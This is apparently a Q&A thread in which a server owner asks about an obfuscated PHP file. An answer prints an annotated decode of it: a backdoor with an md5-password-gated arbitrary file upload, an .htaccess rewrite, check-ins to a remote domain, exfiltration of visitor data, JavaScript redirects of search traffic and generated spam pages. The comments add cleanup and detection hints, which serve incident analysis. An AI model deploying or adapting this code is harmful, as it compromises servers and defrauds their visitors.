发现一个带有加密代码的可疑PHP文件,有人可以为我推断这个吗? [关闭]

Here is the pastebin link of the decrypted PHP code: http://pastebin.com/7HU17uqA. This file has been eating all the CPU cycles on one of my VPSes.

This is a backdoor script that enables an attacker to upload files to your server. I'll edit my answer with more info as I continue to reverse-engineer the encoding.

There's enough bad stuff here to know it's a backdoor.

It's not encrypted - it's encoded using base64. I simply changed the file (using search/replace in my editor) to echo the results of both the $GLOBALS['455396494'] array and the function _630330270. I renamed them to keywords and decrypto in my file. Here's an example of what I mean.

<?= $GLOBALS['keywords'][0]; ?>(round(0));

if (isset($_GET[<?= decrypto( 0 ); ?>]))
{ 
if( !( <?= $GLOBALS['keywords'][1]; ?>("/^([a-z0-9\-\.\)\(\&\=]*)$/i", $_GET[<?= decrypto( 1 ); ?>])))
{
die;

Here is a partial decode of the script:

// Decoded backdoor, part 1: global setup.
// Reading note for this listing: the decode stripped the quotes from string
// literals ($_GET[q] is $_GET['q'], alcobro is 'alcobro', ...) and the stray
// "; ?>" fragments are leftovers of the echo-based search/replace, not code.
// round(0), round(0+0.5+0.5), round(0+10+10), ... are obfuscated integer
// constants (0, 1, 20, ...). Cleanup for this infection means deleting this
// file, the .log/ tree it creates and the .htaccess it writes; because it also
// accepts password-gated file uploads, treat the host as fully compromised.

// Silence all PHP errors (round(0) == 0) so nothing below reaches the logs.
error_reporting(round(0));



// ?q= is the routing key for everything below. When present it must match the
// character whitelist [a-z0-9.()&=-] or the request is dropped outright.
if (isset($_GET[q]))

{ 

if( !( preg_match("/^([a-z0-9\-\.\)\(\&\=]*)$/i", $_GET[q])))

{

die;


}

}



// l__0($url): the script's HTTP fetch helper. The check-ins to the reporting
// domain and the Google scrapes further down all go through it (only the fetch
// of the site's own front page for don.txt calls file_get_contents directly),
// so blocking or proxying outbound HTTP from the web server neuters most of
// the script. The obfuscated curl option numbers are:
//   10002 = CURLOPT_URL, 42 = CURLOPT_HEADER (0), 19913 = CURLOPT_RETURNTRANSFER (1),
//   52 = CURLOPT_FOLLOWLOCATION (1), 13 = CURLOPT_TIMEOUT (20 s), 3 = CURLOPT_PORT (80),
//   10018 = CURLOPT_USERAGENT; 2097154 = CURLINFO_HTTP_CODE.
// Returns the response body, or false when the HTTP status is 400 or above.
// Detection hint: the hard-coded "MSIE 6.0 ... InfoPath.1" User-Agent on
// connections originating from the web server is a good egress-log indicator.
if (extension_loaded(curl) && function_exists(curl_init) && function_exists(curl_exec)) {

    function l__0($_0) {

        $_1 = curl_init; ?>();


        curl_setopt; ?>($_1, 10002, $_0);


        curl_setopt; ?>($_1, 42, round(0));


        curl_setopt; ?>($_1, 19913, round(0+0.2+0.2+0.2+0.2+0.2));


        curl_setopt; ?>($_1, 52, round(0+0.5+0.5));


        curl_setopt; ?>($_1, 13, round(0+10+10));


        curl_setopt; ?>($_1, 3, round(0+40+40));


        curl_setopt; ?>($_1, 10018, Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 2.0.50727; InfoPath.1));


        $_2 = curl_exec; ?>($_1);


        $_3 = curl_getinfo; ?>($_1, 2097154);


        // Any 4xx/5xx answer is treated as "no data".
        if ($_3 >= round(0+400))

            $_2 = false;


        curl_close; ?>($_1);


        return $_2;


    }

}

// Fallback when curl is unavailable: plain file_get_contents over HTTP.
else if(function_exists; ?>( file_get_contents)) {


    function l__0($_0) {

        return file_get_contents; ?>($_0);


    }

}

else

    die( not work);






// Part 2: working directory. $_4 is the Host header with a leading "www."
// removed. HTTP_HOST is client-supplied and is used unvalidated to build
// filesystem paths under .log/ below.
$_4 = preg_replace; ?>( /^www\./,  , $_SERVER[ HTTP_HOST]);









// Create .log/ and .log/<host>/ in the script's directory; 511 decimal is
// 0777, i.e. both are left world-writable. Cleanup: remove the whole .log/
// tree — it holds xml.cgi, don.txt and the generated *.html spam pages.
@mkdir; ?>( .log/);


@chmod; ?>( .log/,round(0+255.5+255.5));


@mkdir; ?>( .log/.$_4);


@chmod; ?>( .log/.$_4,round(0+102.2+102.2+102.2+102.2+102.2));







// .log/<host>/xml.cgi holds the base64-encoded domain the script reports to.
// It is seeded once with bXlkaWFyeXVzYS5uZXQ= (decodes to mydiaryusa.net) and
// can later be overwritten through the password-gated dom100500 parameter.
$_5 =  .log/.$_4. /xml.cgi;


if (@fopen; ?>($_5,  r)) {} else {

$_6 = fopen; ?>( .log/.$_4. /xml.cgi, w+);


fwrite; ?>($_6,  bXlkaWFyeXVzYS5uZXQ=);


fclose; ?>($_6);


}




// Part 3: activation switch. A request with ?q=alcobro turns on site-wide URL
// hijacking: if no .htaccess exists yet, one is written that rewrites every
// request for a non-existent file or directory to this script as ?q=<path>,
// and $_7 records "enable"; if an .htaccess already exists nothing is written
// and $_7 is "disable". Either way the host name is then reported to
// http://<xml.cgi domain>/other/logdomain.php and the reply plus $_7 is echoed.
// Cleanup: inspect .htaccess for this RewriteRule; grep access logs for
// "q=alcobro" to date the compromise.
if ( $_GET[ q] ==  alcobro ) {



$_5 =  .htaccess;


if (file_exists; ?>($_5)) {

     $_7 =  disable;


} else      {

// mod_rewrite block injected into .htaccess (SCRIPT_NAME is this file's path).
$_8 = "<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule ^(.*)$ ".$_SERVER[ SCRIPT_NAME]."?q=$1 [L]

</IfModule>";


$_9 =

 fopen; ?>( .htaccess, w+);


fwrite; ?>($_9,$_8);


fclose; ?>($_9);


$_7 =  enable;


     }







     // Check-in: tells the reporting domain which host was just activated.
     $_10 =  base64_decode; ?>(file_get_contents; ?>( .log/.$_4. /xml.cgi));


     $_11 =  http://.$_10. /other/logdomain.php?q=.$_SERVER[ HTTP_HOST];


     $_12 = l__0($_11);


     echo $_12.$_7;


 die;






}





// Part 4: password-gated control channel. Entered only when the POST field
// "name" md5-hashes to 42a3f0678d1bbb517272142f5b3df3cd — the hash is the only
// gate, there is no other authentication.
//   ?dom100500=<value>  overwrites .log/<host>/xml.cgi, repointing the
//                       reporting domain; responds "100500ok".
//   ?up100500=<value>   moves the multipart field "uploaded" into the current
//                       working directory under its original basename with no
//                       extension or content check — this is the arbitrary
//                       file upload the answer refers to; responds "up100500".
// Detection: POST requests whose query string carries dom100500 or up100500,
// and responses containing the literal "100500ok" / "up100500".
$_13 = $_POST[ name];


if (md5; ?>($_13) ==  42a3f0678d1bbb517272142f5b3df3cd) {




if ($_GET[ dom100500] !=  ) {

    $_14 = fopen; ?>( .log/.$_4. /xml.cgi, w+);


    fwrite; ?>($_14,$_GET[ dom100500]);


    fclose; ?>($_14);


    echo  100500ok;


    die;


}






if ($_GET[ up100500] !=  ) {

    $_15 =  ;


    // Destination is just basename(<client-supplied file name>), relative to cwd.
    $_15 = $_15 . basename; ?>( $_FILES[ uploaded][ name]) ;


    $_16=round(0+0.333333333333+0.333333333333+0.333333333333);


    if(move_uploaded_file; ?>($_FILES[ uploaded][ tmp_name], $_15)) {

        echo  up100500;


    }

    echo  <form enctype="multipart/form-data" method="POST"><input name="uploaded" type="file"><input type="submit" value="U"></form>;


    die;


}

}






// Part 5: visitor hijack (cloaking). For requests whose Referer contains
// "google." (and does not contain "site%"), the visitor's IP, referer, user
// agent, host and the ?q keyword are sent to http://<xml.cgi domain>/out/stat.cgi
// and, if the reply contains "http://", a JavaScript top-frame redirect to the
// reply is emitted and the request ends. Visitors arriving from search are
// thus bounced to a third-party site while direct visits see nothing.
// Mitigation: egress-block the reporting domain; the redirect then never fires.
if ( strpos; ?>( $_SERVER[ HTTP_REFERER],  site% ) > round(0) ) {} else {

if ( strpos; ?>( $_SERVER[ HTTP_REFERER],  google. ) > round(0) ) { 





    $_10 =  base64_decode; ?>(file_get_contents; ?>( .log/.$_4. /xml.cgi));


    // Keyword: ?q with "-" turned back into spaces.
    $_17 = str_replace; ?> ( -,   , $_GET[ q]);


    $_18 =  http://.$_10. /out/stat.cgi?parameter=.rawurlencode; ?>(strtolower; ?>($_4.$_SERVER[ SCRIPT_NAME]. :.$_10)). &ip=.rawurlencode; ?>($_SERVER[ REMOTE_ADDR]). &ref=.rawurlencode; ?>(strtolower; ?>($_SERVER[ HTTP_REFERER])). &useragent=.rawurlencode; ?>(strtolower; ?>($_SERVER[ HTTP_USER_AGENT])). &domain=.rawurlencode; ?>(strtolower; ?>($_SERVER[ HTTP_HOST])). &visit=1&keyword=.rawurlencode; ?>($_17). &sheme=22;


    $_19 =  ;


    $_19 = l__0($_18);


    // The remote side decides the redirect target at request time.
    if (preg_match; ?>( |http://|iU, $_19 )) 

    {

            echo  <script>var url = ".$_19. "; if (window!=top) {top.location.href = url;} else { document.location= url;}</script>;


            die;


    } 





    }

}












// l__1($keyword): builds one spam ("doorway") page for the keyword in ?q and
// returns it as an HTML fragment that the caller substitutes for <REPLACEME>.
// This is the CPU/bandwidth hog: for every keyword that is not yet cached it
// makes three outbound requests (Google web search, Google Images, Google
// Suggest), plus a fetch of the site's own front page the first time, and then
// generates about 1400 words of word-chain text from the scraped snippets.
// Each request with a fresh ?q therefore costs several remote fetches.
function l__1($_20) {

$_4 = preg_replace; ?>( /^www\./,  , $_SERVER[ HTTP_HOST]);



    // Keyword from ?q with "/" stripped, then "-"/"_" turned into "+" for the
    // Google query string.
    $_21 = isset($_GET[ q]) ? str_replace; ?>( /,  , urldecode; ?>($_GET[ q])) : FALSE;


    $_22 = str_replace; ?>( -, +,$_21);


    $_22 = str_replace; ?>( _, +,$_21);


    // Remote fetch 1: 100 Google web results for the keyword.
    $_23 =  http://www.google.com/search?hl=en&as_q=.$_22. &num=100&as_qdr=all;


    $_24 = l__0($_23);


    // Scrape the result snippets (<div class="s">...<br>) and strip markup and
    // HTML entities so only plain sentence text remains.
    preg_match_all; ?>( #<div class="s">(.*)<br>#U,$_24,$_25);


    $_26=array();


    for ($_27=round(0);
$_27<count; ?>($_25[round(0+0.2+0.2+0.2+0.2+0.2)]);
$_27++) {

        $_28=trim; ?>($_25[round(0+0.5+0.5)][$_27]);


        $_28=strip_tags; ?>($_28, <em>);


        $_28=str_replace; ?>( em>, b>,$_28);


        $_28=str_replace; ?>( ..., . ,$_28);


        $_28=str_replace; ?>( &amp;#39;,  ',$_28);


        $_28=str_replace; ?>( &#39;,  ',$_28);


        $_28=str_replace; ?>( #039;,  ',$_28);


        $_28=str_replace; ?>( &amp;quot;,  ,$_28);


        $_28=str_replace; ?>( middot;,  ,$_28);


        $_28=str_replace; ?>( quot;,  ,$_28);


        $_28=str_replace; ?>( amp;,  ,$_28);


        $_28=str_replace; ?>( nbsp;,  ,$_28);


        $_28=str_replace; ?>( —,   ,$_28);


        $_28=strip_tags; ?>($_28);


        array_push; ?>($_26,$_28);


    }

    // Corpus for the text generator: the first 50 cleaned snippets concatenated.
    for ($_27=round(0);
$_27<round(0+25+25);
$_27++) {

        $_29.=$_26[$_27];


    }







    // l__2: word-chain text generator. The constructor normalises the corpus,
    // splits it into sentences and words, and records for every word the list
    // of words that followed it ($this->_30[word][] = next word). l__3($n) then
    // walks random chains through that table to produce roughly $n words of
    // pseudo-sentences. This is what makes the spam pages look like prose.
    Class l__2

    {

        var $_30 = array();




        function l__2($_31)

        {

            $_31 = strtolower; ?>($_31);


            $_31 = str_replace; ?>(array ( ? ,  ! ),  ., $_31);


            $_31 = str_replace; ?>(array (  -,  - ,     ,  
,  
,  |,   &,  \,  /,    :,   ;,  ©,  ·),   , $_31);


            $_31 = str_replace; ?>(array ( ),  (,  ],  [,  —,  ',  ",  *,  •,  ~,  {,  }),  , $_31);


            $_31 = str_replace(  ,,  ,, $_31);


            $_31 = preg_replace( ~(\s+\d{1,2}\s+)|(\w*\.\w+)~,   , $_31);


            $_31 = preg_replace( ~\s+~,   , $_31);




            // Sentences are split on ". ", words on " ".
            $_32 = explode( . , $_31);


            $_33 = count($_32);


            for ($_34=round(0);
 $_34<$_33;
 ++$_34)

            {

                    $_32[$_34] = explode(  , $_32[$_34]);


                    $_35 = count($_32[$_34]) - round(0+0.5+0.5);


                    for ($_36=round(0);
 $_36 < $_35;
 ++$_36)

                    {

                        $_37 = $_32[$_34][$_36];


                        // Record word -> following word.
                        $this->_30[$_37][] = $_32[$_34][$_36+round(0+0.25+0.25+0.25+0.25)];


                    }

            }



            $_38 = array_keys($this->_30);


            foreach ($_38 as $_21)

            {

                    $this->_30[$_21] = array_unique($this->_30[$_21]);


            }

        }



        // Generate at least $_39 words: pick a random start word, follow random
        // successors for 5..12 words per sentence, repeat until the word count
        // is reached; then tidy sentence endings and capitalise each sentence.
        function l__3($_39)

        {

            $_40 = round(0);


            for ($_34=round(0);
 $_40 < $_39;
 ++$_34)

            {

                    $_41 = array_rand($this->_30);


                    $_42  = mt_rand(round(0+5), round(0+3+3+3+3));


                    for ($_36=round(0);
 $_36<$_42;
 ++$_36)

                    {   

                    $_43[$_34][$_36] = $_41;


                        ++$_40;


                        $_44 = $this->_30[$_41][mt_rand(round(0), count($this->_30[$_41]) - round(0+0.25+0.25+0.25+0.25))];


                        if ($_44 ==  ) $_44 = array_rand($this->_30);


                        $_41 = $_44;


                        if ($_41 ==  ) break round(0+2);


                    }

            }



            foreach ($_43 as $_45)

            {

                    $_46=count($_45);


                    // Drop sentences of two words or fewer.
                    if ($_46<=round(0+1+1)) continue;




                    if (strlen($_45[$_46-round(0+0.333333333333+0.333333333333+0.333333333333)]) < round(0+1+1+1+1)) unset($_45[$_46-round(0+0.5+0.5)]);




                    $_45[$_46-round(0+1+1)] = rtrim($_45[$_46-round(0+0.5+0.5+0.5+0.5)],  ,:;);


                    $_45[$_46-round(0+1)] = rtrim($_45[$_46-round(0+0.5+0.5)],  ,:;);


                    $_47 .= ucfirst(implode(  , $_45)). . ;


            }



            $_47 = str_replace(  .,  ., $_47);




            return $_47;


        }



    }



    // Generate ~1400 words of filler and keep only letters and basic punctuation.
    $_31 = $_29;


    $_48 = new l__2($_31);


    $_49 = $_48->l__3(round(0+466.666666667+466.666666667+466.666666667));


    $_49 = preg_replace( /[^a-zA-Z\., -]+?/,  , $_49);








    // Keyword again, space-separated, for the image search, titles and headings.
    $_50 = isset($_GET[ q]) ? str_replace( /,  , urldecode($_GET[ q])) : FALSE;


    $_50=str_replace( -,  ,$_50);


    $_50=str_replace( _,  ,$_50);







$_51 = str_replace (  ,  +, $_50);


// ?page=N selects the Google Images result offset (N-1)*21.
if($_GET[ page] !=  1) { $_52 =  &start=.($_GET[ page]-round(0+0.25+0.25+0.25+0.25))*round(0+7+7+7);
 }

// Remote fetch 2: Google Images; every imgres result becomes a hotlinked
// <img> with a random alignment.
$_53 = l__0( http://images.google.com/images?q=.$_51. &lr=lang_en.$_52);


preg_match_all( /href="?\/imgres\?imgurl=([^\&]+)/, $_53, $_54);


$_55 = array();


for ($_36 = round(0);
 $_36 < count($_54[round(0+0.333333333333+0.333333333333+0.333333333333)]);
 $_36++) {

    $_56 = array( right,  left,  center);


    array_push($_55,  <img src=" . $_54[round(0+0.5+0.5)][$_36] .  " alt=".ucwords($_51). " align=".$_56[array_rand($_56)]. ">);


}

shuffle($_55);










// Base URL for the internal links: explicit "?q=" when the script was hit by
// its .php path, otherwise the script's directory (the .htaccess rewrite
// supplies ?q from the path).
if (strstr($_SERVER[ REQUEST_URI],  .php)) {

$_57 =  http://.$_SERVER[ HTTP_HOST].$_SERVER[ SCRIPT_NAME]. ?q=;


} else {

$_57 =  http://.$_SERVER[ HTTP_HOST].preg_replace( /[^\/]*?$/,  , $_SERVER[ SCRIPT_NAME]);


}




    // Link block 1: the 30 most recently created cached pages in
    // .log/<host>/*.html, sorted by filectime (3 = SORT_DESC), as <a> tags.
    $_58 = round(0+10+10+10);


    $_59 = glob(  .log/.$_4. /*.html );


    array_multisort( array_map( filectime, $_59), 3, $_59 );


    $_60 = round(0+1);


    $_61 =  ;


    foreach ( $_59 as $_62 )

    {

        if ( $_60 > $_58 ) break;


        preg_match_all(  #^\.log/.$_4."/(.*)\.html$#i", $_62, $_63 );


        $_61 .=  <a href=".$_57.$_63[round(0+0.25+0.25+0.25+0.25)][round(0)]. " title=".str_replace(  _,   , str_replace(  -,   , $_63[round(0+0.5+0.5)][round(0)])). ">.str_replace(  _,   , str_replace(  -,   , $_63[round(0+0.5+0.5)][round(0)])). </a>, ;




        $_60++;


    }




    // Remote fetch 3: Google Suggest completions for the keyword, about a
    // dozen of which become further internal links (new keywords to spam).
    $_64 = l__0( http://clients1.google.com/complete/search?hl=en&ds=i&q= . str_replace(  ,  %20, $_50));


    preg_match_all( |\["([^"]+)",|si, $_64, $_65, 1);


    $_66 = round(0);


    array_shift($_65[round(0+1)]);


    foreach ($_65[round(0+0.25+0.25+0.25+0.25)] as $_67) {

        $_68 .=  <a href='.$_57.str_replace(  ,  -, $_67). ' title='.$_67. '> . $_67 .  </a>, ;


        if ($_66++ > round(0+5.5+5.5)) break;


    }





    // Link block 3: "Page 2" .. "Page 7" pagination links back to this script.
    $_69 = $_57.$_GET[ q];


    $_70 =  <a href=".$_69. &page=2" title=".ucwords($_50). ">.ucwords($_50).  - Page 2</a> | <a href=".$_69. &page=3" title=".ucwords($_50). ">.ucwords($_50).  - Page 3</a> | <a href=".$_69. &page=4" title=".ucwords($_50). ">.ucwords($_50).  - Page 4</a> | <a href=".$_69. &page=5" title=".ucwords($_50). ">.ucwords($_50).  - Page 5</a> | <a href=".$_69. &page=6" title=".ucwords($_50). ">.ucwords($_50).  - Page 6</a> | <a href=".$_69. &page=7" title=".ucwords($_50). ">.ucwords($_50).  - Page 7</a>;













// Body: generated sentences and image tags shuffled together.
$_71 = explode (  ., $_49 );


$_2 = array_merge($_71, $_55);


shuffle($_2);




foreach ($_2 as $_72) {

$_73 .= $_72;


}






// Template cache .log/<host>/don.txt: on first run fetch the site's own front
// page, drop its meta description, find the longest element that contains no
// <script>, append a <REPLACEME> marker after it and save the result. The
// infected site's own layout is reused so the spam looks native to the site.
$_74 =  .log/.$_4. /don.txt;





if ( !file_exists( $_74 ) ) {

    $_75 = file_get_contents(  http://.$_SERVER[ HTTP_HOST] );


    $_75 = preg_replace(  /<meta(.*)name="description"(.*)>/i,  , $_75 );



    $_76 = preg_match_all(  /<([a-zA-z]+)>(.*)<\/([a-zA-Z]+)>/imsU, $_75, $_77 );


    $_78 = round(0);


    $_79 = round(0);




    for ( $_36 = round(0);
 $_36 < $_76;
 $_36++ ) {

        if ( (preg_match( /\<script/imsU, $_77[round(0)][$_36]) == round(0)) AND (strlen($_77[round(0)][$_36]) > $_78) ) {

            $_78 = strlen($_77[round(0)][$_36]);


            $_79 = $_36;


        }

    }



    $_75 = str_replace( $_77[round(0)][$_79], $_77[round(0)][$_79]. <REPLACEME>, $_75 );





    $_80 = fopen( $_74,  w );


    fputs($_80, $_75);


    fclose($_80);




}




// Assemble: heading, suggest links, recent-page links, body, pagination.
// $_82 is not assigned anywhere in this listing, so it contributes nothing.
$_81 =  <h1>.strtoupper($_50).$_82. </h1>
.$_68.$_61. 
.$_73. 
<p>.$_70. </p>;


    return $_81;


}






// l__4($slug): page-cache front end. Returns .log/<host>/<slug>.html<page> if
// it already exists; otherwise generates the page with l__1, writes it to that
// path and returns it. Every file matching that pattern is generated spam and
// can be deleted. The file_get_contents after the return is dead code.
function l__4($_83) {

$_4 = preg_replace( /^www\./,  , $_SERVER[ HTTP_HOST]);


    // Cache key embeds ?page, so each pagination page is cached separately.
    $_84= .log/.$_4. /.$_83 . .html.$_GET[ page];


    if(@file_exists($_84))return@file_get_contents($_84);


    $_20=str_replace( -,  ,$_83);


    $_20=str_replace( +,  ,$_83);


    $_85=l__1($_20);


    $_86=@fopen($_84, w);


    @fwrite($_86,$_85);


    @fclose($_86);


    return $_85;


    $_87=file_get_contents($_84);

}






        // Part 6: request dispatch. Any request with a non-empty ?q (which, once
        // the .htaccess rule is in place, is every URL that does not map to a real
        // file or directory) is answered with a generated page: the cached site
        // template from .log/<host>/don.txt (or a bare HTML skeleton when that file
        // is under 800 bytes), <title> set to the keyword, <REPLACEME> replaced by
        // l__4()'s output, printed, then exit.
        if($_GET[ q]!=  )

        {

$_74 =  .log/.$_4. /don.txt;


if  (filesize($_74) < round(0+200+200+200+200) ) {

$_75 =  <head>
<title>title</title>
</head>
<body>
<REPLACEME>
</body>
</html>;


} else {

$_75 = file_get_contents( $_74 );


}



// Cache slug is the basename of ?q; the display keyword has "-" and ".html" removed.
$_88=basename($_GET[ q]);


$_50 = $_GET[ q];


$_50=str_replace( -,  ,$_50);


$_50=str_replace( .html, ,$_50);






$_75 = preg_replace(  /<title>(.*)<\/title>/imsU,  <title>.ucwords($_50). </title>, $_75 );


$_75 = str_replace(  <REPLACEME>, l__4($_88), $_75 );


print $_75;


exit;


                    }